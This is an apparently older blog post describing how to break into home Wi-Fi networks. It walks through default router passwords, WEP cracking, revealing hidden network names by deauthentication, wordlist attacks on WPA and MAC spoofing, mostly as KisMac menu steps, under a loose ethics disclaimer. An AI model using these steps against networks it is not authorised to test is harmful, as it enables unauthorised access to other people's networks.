Your home wireless network is not safe.
some of the attacks are shown here
Sorry, it’s just not. Mine isn’t either. There’s really no way around it. This article will describe several popular router configurations and how to break through them.
1) Out-of-the-box.
For instance, consider a family using a Linksys router to share their high-speed to their laptops, etc. Most likely the log in is 192.168.0.1 with user “admin” and password “admin” - with that alone you could wreak all sorts of nasty havoc on their network or lock them out entirely. Not good. Never use the defaults, and update your passwords. This isn’t just linksys routers either - it’s very simple to determine what time of router your are seeing and then you can easily google the default passwords to log into it. Vonage, Verizon, Dlink users - I’m looking at you.
2) WEP Protection
Supposedly WEP is “good enough”. Well, maybe… it’s a deterrent I suppose. These are very very common password protected networks. The Geek Squad will set it up for you, that sort of thing. Here’s how to break in with KisMac…
- First, if the network is hidden - see #3 first.
- Ok, now follow the screenshot - run a authentication flood. This will create unique IVs, which you’ll need over 100k (that’ll take 5-10 minutes to capture) you can speed this process up several ways, such as performing a packet reinject (that menu item)
- Keep an eye on the unique IV’s - and whenever you feel “lucky” you can try one of the attacks, weak scheduling vs a 40-bit has worked for me in the past. I mean… for testing purposes, of course
3) Hidden ESSID
This is a “hidden” network where typically you don’t see the network’s name come up on your computer as an available network. BestBuy in Seekonk, MA hides their “BestBuy” network this way. Quite simple to just type in and access. But you of course, have to know the ID to even get there. Now, BustBuy was easy to guess. But what if it was something a bit more random like B3stBu7 - well we might not guess that.
Breaking in: If you can guess the name, that’s all you need. If you are running something that identifies a hidden network the way of getting the name is to hit it with a De-authenticate. First, set your program to sniff on the channel you found the hidden essid on. Next, perform the deauthentication.This is built into KisMac, and extremely ease to use. Deauthenticate is under the network menu in KisMac. What this does is basically fools the router. When performing this attack your computer will pretend to be the router and all the clients on the network will need to reauthenticate themselves. In the confusion, the name of the network will be revealed to you - and you’re in. You can see an example of a hidden network in my screenshot.
4) WPA
Well now things are getting tricky. Locking down your wireless with WPA involves a complicated process with both parties in the connection performing a super double secret handshake to even talk to one another. If neither likes the other, it’s no go - this is why people choose this protection. But it can be broken, with time.
KisMac features several means under the crack menu. Most involved blowing tons of words “a wordlist” at it to try and get it. Just choose it from the menu. As you capture packets listening in on the network, KisMac is smart enough to use portions of the keys it finds in the packets to help get it. So, this is why it’s a time-consuming trial and error sort of thing. Maybe 20-30 minutes or more of trial and error with this menu will get you there… eventually.
5) MAC filters
I used to advise people that this was a good means of protection. I did so under then philosophy that nothing is %100 safe, and a MAC filter is a great deterent. Basically a MAC filter means that the router only allows connections to computers that it knows. Every network device has a MAC address - a unique identifier. This is hardware-based so the router really only talks to computers that you physically know about. Well… sort of.
To crack it you basically need to just pretend to be one of those computers it will let it. Which ones will it allow? That’s easy - any computer that’s currently on the network. So using any sort of network profiling too - I’ll use KisMac again as an example but certainally others would work too. View the clients on the network, and use one of their MAC address.
How do you do that? This is called MAC spoofing, where esentially you pretend to have a different MAC address. There are a bunch of ways to do this. Here are a few ideas, none are gaurnteed to work, but have in the past in some form or another…
- Using linux or Mac OS X - you can check out what your MAC address is in your config files. This has worked on an older red hat distro - where these config files were saved some place like /etc/network-scripts … something like that, you’ll have to google it.
- Here’s a fun way to do it - use Virtualization! Grab virtual box or something like that (maybe vmware fusion, haven’t tried though) inside your virtual machine there’s yet another glorious configration file with … you guessed it… the MAC address which you can freely change (to something on the network, in our scenario)
Other considerations
- This stuff is pretty serious, I’m relaying it for ethical purposes. Don’t go be a douche and cause trouble.
- Working in a Virtual environment is good, that way it’s not your computer if things get nasty. Try it out though - see if you virtual MAC address appears on your router, it’s quite possible you’ll only see your computer’s as by default many virtualization environments treat the vm’s as a private local/sub network - with your computer as the access point.
Be safe and ethical! Happy hacking!
